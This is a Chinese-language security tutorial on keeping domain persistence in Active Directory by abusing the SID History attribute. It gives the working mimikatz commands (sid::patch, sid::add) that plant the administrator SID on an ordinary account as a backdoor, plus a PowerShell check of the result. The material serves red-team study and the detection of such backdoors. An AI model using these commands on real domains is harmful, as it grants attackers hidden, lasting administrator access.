域权限维持-SID History

一、SID

每个用户都有自己的SID。SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限。

 

二、SID History

SID History是在域迁移过程中需要使用的一个属性。

如果将A域中的域用户迁移到B域中，那么在B域中该用户的SID会随之改变，进而影响迁移后用户的权限，导致迁移后的用户不能访问本来可以访问的资源。

SID History的作用是在域迁移过程中保持域用户的访问权限，即如果迁移后用户的SID改变了，系统会将其原来的SID添加到迁移后用户的SID History属性中，使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。

使用mimikatz，可以将SID History属性添加到域中任意用户的SID History属性中。在实战中，如果获得了域管理员权限，则可以将SID History作为实现持久化的方法。

 

三、mimikatz添加SID History后门

1、打开一个具有域管理员权限的命令行窗口，然后打开mimikatz，将administrator的SID添加到hack用户的SID History属性中。

需要注意的是，在使用mimikatz注入SID之前，需要使用 sid::patch 命令修复NTDS服务，否则无法将高权限的SID注入低权限用户的SID History属性；mimikatz在2.1版本后，将 misc:addsid 模块添加到了 sid:add 模块下。

privilege::debug
sid::patch
sid::add /sam:hack /new:administrator     #将administrator的SID添加到hack的SID History属性中

 

2、使用PowerShell查看test用户的SID History

Import-Module activedirectory
Get-ADUser hack -Properties sidhistory

 

3、使用域用户hack登录系统，测试其是否具有administrator用户的权限，这里尝试列出域控的C盘。